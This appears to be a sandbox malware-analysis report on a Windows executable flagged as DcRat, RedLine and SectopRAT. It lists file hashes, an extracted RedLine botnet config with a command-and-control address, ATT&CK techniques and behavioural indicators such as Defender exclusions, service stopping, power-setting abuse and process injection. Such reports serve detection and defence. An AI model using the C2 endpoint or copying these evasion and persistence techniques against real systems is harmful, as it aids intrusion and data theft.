dcrat | ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c

Analysis

max time kernel
150s
max time network
150s
platform
windows10-2004_x64
resource
win10v2004-20241007-en
resource tags

arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
submitted
09-11-2024 10:51

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe
Size

7.3MB
MD5

06293c3726a8b6029225668dcfb8c7e8
SHA1

1db3a38e9cff8b2aec7b73668e6768002c2bddbf
SHA256

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
SHA512

33a80c1dec409c83d82cb9e1149a90ca11024d726b58b83035ab149b22989c4406cacab57adf6da5ce0d49cb393d4c2fcf58cd2491d0b0c0c5382e06bc35f376
SSDEEP

196608:68waBBQvE8waBBQv36od0Ntiq0rG6MvF:68waB+88waB+/jwtivrr

Score

10^/10

dcrat redline sectoprat lucifer defense_evasion discovery evasion execution exploit infostealer persistence rat trojan

Malware Config

Extracted

Family

redline

Botnet

Lucifer

162.55.169.73:49194

Signatures

DcRat
DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.
rat infostealer dcrat
Dcrat family
dcrat
Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000c000000023bad-5.dat	family_redline
behavioral2/memory/3192-16-0x0000000000D60000-0x0000000000D7E000-memory.dmp	family_redline

Redline family
redline
SectopRAT
SectopRAT is a remote access trojan first seen in November 2019.
trojan rat sectoprat

SectopRAT payload 2 IoCs

Processes:

resource	yara_rule
behavioral2/files/0x000c000000023bad-5.dat	family_sectoprat
behavioral2/memory/3192-16-0x0000000000D60000-0x0000000000D7E000-memory.dmp	family_sectoprat

Sectoprat family
sectoprat

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description	pid	Process	procid_target
PID 488 created 624	488	powershell.EXE	5

Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

execution

PowerShell

T1059.001

Processes:

powershell.exepowershell.exepowershell.exepowershell.EXEpowershell.EXE

pid	Process
2424	powershell.exe
3632	powershell.exe
3096	powershell.exe
636	powershell.EXE
488	powershell.EXE

Drops file in Drivers directory 4 IoCs

Processes:

conhost.execonhost.execonhost.execonhost.exe

description	ioc	Process
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe
File opened for modification	C:\Windows\system32\drivers\etc\hosts	conhost.exe

Possible privilege escalation attempt 8 IoCs

exploit

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid	Process
3896	icacls.exe
2136	takeown.exe
3332	icacls.exe
2488	takeown.exe
2624	icacls.exe
1700	takeown.exe
1956	icacls.exe
3472	takeown.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

windowshost.exeWScript.exe

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	windowshost.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 7 IoCs

Processes:

explorer.exewindowshost.exesvchost.exesvchost.execominto.exeupdater.exeupdater.exe

pid	Process
3192	explorer.exe
5052	windowshost.exe
3520	svchost.exe
2476	svchost.exe
1552	cominto.exe
852	updater.exe
4948	updater.exe

Modifies file permissions 1 TTPs 8 IoCs

discovery

File and Directory Permissions Modification

T1222

Processes:

icacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exeicacls.exetakeown.exe

pid	Process
3896	icacls.exe
2136	takeown.exe
3332	icacls.exe
2488	takeown.exe
2624	icacls.exe
1700	takeown.exe
1956	icacls.exe
3472	takeown.exe

Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
defense_evasion

Command Obfuscation
T1027.010

Power Settings 1 TTPs 20 IoCs

powercfg controls all configurable power system settings on a Windows system and can be abused to prevent an infected host from locking or shutting down.

persistence

Power Settings

T1653

Processes:

powercfg.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.execmd.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execmd.exepowercfg.execmd.exepowercfg.exepowercfg.exe

pid	Process
4324	powercfg.exe
2340	powercfg.exe
1344	powercfg.exe
2672	cmd.exe
220	powercfg.exe
4936	powercfg.exe
3468	cmd.exe
3684	powercfg.exe
556	powercfg.exe
2588	powercfg.exe
2420	powercfg.exe
2340	powercfg.exe
3724	powercfg.exe
1600	powercfg.exe
3940	powercfg.exe
4112	cmd.exe
1280	powercfg.exe
2384	cmd.exe
2488	powercfg.exe
4428	powercfg.exe

Drops file in System32 directory 12 IoCs

Processes:

OfficeClickToRun.exepowershell.EXEsvchost.exepowershell.EXE

description	ioc	Process
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.EXE.log	powershell.EXE
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml	OfficeClickToRun.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A	OfficeClickToRun.exe
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE

Suspicious use of SetThreadContext 5 IoCs

Processes:

conhost.execonhost.exepowershell.EXEconhost.execonhost.exe

description	pid	Process	procid_target
PID 1124 set thread context of 4244	1124	conhost.exe	123
PID 4504 set thread context of 2164	4504	conhost.exe	139
PID 488 set thread context of 3456	488	powershell.EXE	193
PID 1400 set thread context of 4520	1400	conhost.exe	236
PID 4076 set thread context of 4512	4076	conhost.exe	267

Drops file in Windows directory 8 IoCs

Processes:

conhost.execonhost.exe

description	ioc	Process
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc32.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File opened for modification	C:\Windows\Tasks\dialersvc64.job	conhost.exe
File created	C:\Windows\Tasks\dialersvc32.job	conhost.exe

Launches sc.exe 60 IoCs

Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exe

pid	Process
2100	sc.exe
408	sc.exe
4184	sc.exe
4688	sc.exe
4496	sc.exe
4916	sc.exe
4004	sc.exe
1720	sc.exe
2016	sc.exe
3280	sc.exe
2788	sc.exe
1816	sc.exe
3936	sc.exe
4556	sc.exe
3644	sc.exe
4108	sc.exe
3728	sc.exe
3248	sc.exe
1048	sc.exe
4676	sc.exe
4512	sc.exe
1204	sc.exe
1816	sc.exe
4184	sc.exe
1616	sc.exe
4468	sc.exe
1436	sc.exe
4608	sc.exe
2716	sc.exe
4556	sc.exe
768	sc.exe
548	sc.exe
4424	sc.exe
3724	sc.exe
4344	sc.exe
4860	sc.exe
2136	sc.exe
1960	sc.exe
3476	sc.exe
3744	sc.exe
1520	sc.exe
672	sc.exe
3432	sc.exe
2492	sc.exe
1720	sc.exe
2520	sc.exe
4148	sc.exe
5092	sc.exe
1984	sc.exe
2716	sc.exe
3744	sc.exe
5060	sc.exe
3208	sc.exe
1048	sc.exe
1556	sc.exe
3620	sc.exe
3120	sc.exe
1984	sc.exe
600	sc.exe
760	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 15 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

Processes:

explorer.exepowershell.execmd.execmd.exewindowshost.exepowershell.EXEpowershell.exepowershell.exeWScript.execmd.execmd.execmd.exeac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.execmd.execmd.exe

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	explorer.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	windowshost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.EXEpowershell.EXEOfficeClickToRun.exesvchost.exe

description	ioc	Process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key deleted	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\RulesEndpoint = "https://nexusrules.officeapps.live.com/nexus/rules?Application=officeclicktorun.exe&Version=16.0.12527.20470&ClientId={190ECAB3-FDB0-48D9-90A2-083C27695B48}&OSEnvironment=10&MsoAppId=37&AudienceName=Production&AudienceGroup=Production&AppVersion=16.0.12527.20470&"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSCategoriesSeverities = "1329 10,1329 50,1329 15,1329 100,1329 6"	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor	OfficeClickToRun.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesLastModified\officeclicktorun.exe_queried = "1731149561"	OfficeClickToRun.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Office\16.0\Common\ClientTelemetry\RulesMetadata\officeclicktorun.exe\ULSMonitor\ULSTagIds0 = "5804129,7202269,17110992,41484365,39965824,7153487,17110988,508368333,17962391,17962392,3462423,3702920,3700754,3965062,4297094,7153421,18716193,7153435,7202265,20502174,6308191,18407617"	OfficeClickToRun.exe

Modifies registry class 2 IoCs

Processes:

windowshost.exeExplorer.EXE

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-3442511616-637977696-3186306149-1000_Classes\Local Settings	windowshost.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance\	Explorer.EXE

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

Processes:

schtasks.exeschtasks.exe

pid	Process
2280	schtasks.exe
2392	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.execonhost.execonhost.exepowershell.EXEpowershell.EXEdllhost.exe

pid	Process
2424	powershell.exe
3096	powershell.exe
2424	powershell.exe
3096	powershell.exe
3632	powershell.exe
3632	powershell.exe
3632	powershell.exe
3196	powershell.exe
3196	powershell.exe
4348	powershell.exe
4348	powershell.exe
3196	powershell.exe
4348	powershell.exe
1124	conhost.exe
1124	conhost.exe
4504	conhost.exe
636	powershell.EXE
636	powershell.EXE
488	powershell.EXE
488	powershell.EXE
488	powershell.EXE
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe
3456	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exeexplorer.execominto.exepowershell.exepowershell.exepowershell.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.execonhost.exepowercfg.exepowercfg.exepowercfg.exepowercfg.exepowershell.EXEpowershell.EXEdllhost.exesvchost.exeExplorer.EXEpowershell.exepowershell.execonhost.exesvchost.exe

description	pid	Process
Token: SeDebugPrivilege	2424	powershell.exe
Token: SeDebugPrivilege	3096	powershell.exe
Token: SeDebugPrivilege	3192	explorer.exe
Token: SeDebugPrivilege	1552	cominto.exe
Token: SeDebugPrivilege	3632	powershell.exe
Token: SeDebugPrivilege	4348	powershell.exe
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeDebugPrivilege	1124	conhost.exe
Token: SeShutdownPrivilege	4936	powercfg.exe
Token: SeCreatePagefilePrivilege	4936	powercfg.exe
Token: SeShutdownPrivilege	4324	powercfg.exe
Token: SeCreatePagefilePrivilege	4324	powercfg.exe
Token: SeShutdownPrivilege	2340	powercfg.exe
Token: SeCreatePagefilePrivilege	2340	powercfg.exe
Token: SeShutdownPrivilege	3724	powercfg.exe
Token: SeCreatePagefilePrivilege	3724	powercfg.exe
Token: SeDebugPrivilege	4504	conhost.exe
Token: SeShutdownPrivilege	1344	powercfg.exe
Token: SeCreatePagefilePrivilege	1344	powercfg.exe
Token: SeShutdownPrivilege	1600	powercfg.exe
Token: SeCreatePagefilePrivilege	1600	powercfg.exe
Token: SeShutdownPrivilege	1280	powercfg.exe
Token: SeCreatePagefilePrivilege	1280	powercfg.exe
Token: SeShutdownPrivilege	3940	powercfg.exe
Token: SeCreatePagefilePrivilege	3940	powercfg.exe
Token: SeDebugPrivilege	636	powershell.EXE
Token: SeDebugPrivilege	488	powershell.EXE
Token: SeDebugPrivilege	488	powershell.EXE
Token: SeDebugPrivilege	3456	dllhost.exe
Token: SeAuditPrivilege	2760	svchost.exe
Token: SeShutdownPrivilege	3392	Explorer.EXE
Token: SeCreatePagefilePrivilege	3392	Explorer.EXE
Token: SeShutdownPrivilege	3392	Explorer.EXE
Token: SeCreatePagefilePrivilege	3392	Explorer.EXE
Token: SeShutdownPrivilege	3392	Explorer.EXE
Token: SeCreatePagefilePrivilege	3392	Explorer.EXE
Token: SeShutdownPrivilege	3392	Explorer.EXE
Token: SeCreatePagefilePrivilege	3392	Explorer.EXE
Token: SeShutdownPrivilege	3392	Explorer.EXE
Token: SeCreatePagefilePrivilege	3392	Explorer.EXE
Token: SeShutdownPrivilege	3392	Explorer.EXE
Token: SeCreatePagefilePrivilege	3392	Explorer.EXE
Token: SeDebugPrivilege	3196	powershell.exe
Token: SeShutdownPrivilege	3392	Explorer.EXE
Token: SeCreatePagefilePrivilege	3392	Explorer.EXE
Token: SeDebugPrivilege	1468	powershell.exe
Token: SeDebugPrivilege	1400	conhost.exe
Token: SeAssignPrimaryTokenPrivilege	1828	svchost.exe
Token: SeIncreaseQuotaPrivilege	1828	svchost.exe
Token: SeSecurityPrivilege	1828	svchost.exe
Token: SeTakeOwnershipPrivilege	1828	svchost.exe
Token: SeLoadDriverPrivilege	1828	svchost.exe
Token: SeSystemtimePrivilege	1828	svchost.exe
Token: SeBackupPrivilege	1828	svchost.exe
Token: SeRestorePrivilege	1828	svchost.exe
Token: SeShutdownPrivilege	1828	svchost.exe
Token: SeSystemEnvironmentPrivilege	1828	svchost.exe
Token: SeUndockPrivilege	1828	svchost.exe
Token: SeManageVolumePrivilege	1828	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1828	svchost.exe
Token: SeIncreaseQuotaPrivilege	1828	svchost.exe
Token: SeSecurityPrivilege	1828	svchost.exe
Token: SeTakeOwnershipPrivilege	1828	svchost.exe
Token: SeLoadDriverPrivilege	1828	svchost.exe

Suspicious use of FindShellTrayWindow 2 IoCs

Processes:

Explorer.EXE

pid	Process
3392	Explorer.EXE
3392	Explorer.EXE

Suspicious use of SetWindowsHookEx 6 IoCs

Processes:

Conhost.exeConhost.exeConhost.exeConhost.exeConhost.exeConhost.exe

pid	Process
1976	Conhost.exe
4240	Conhost.exe
2420	Conhost.exe
3636	Conhost.exe
1452	Conhost.exe
4012	Conhost.exe

Suspicious use of UnmapMainImage 1 IoCs

Processes:

Explorer.EXE

pid	Process
3392	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.execmd.execmd.execmd.execmd.execmd.execmd.exewindowshost.exeWScript.execmd.exesvchost.exesvchost.execonhost.execonhost.execmd.execmd.exe

description	pid	Process	procid_target
PID 1724 wrote to memory of 4004	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	83
PID 1724 wrote to memory of 4004	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	83
PID 1724 wrote to memory of 4004	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	83
PID 1724 wrote to memory of 408	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	84
PID 1724 wrote to memory of 408	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	84
PID 1724 wrote to memory of 408	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	84
PID 1724 wrote to memory of 412	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	86
PID 1724 wrote to memory of 412	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	86
PID 1724 wrote to memory of 412	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	86
PID 1724 wrote to memory of 5096	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	87
PID 1724 wrote to memory of 5096	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	87
PID 1724 wrote to memory of 5096	1724	ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c.exe	87
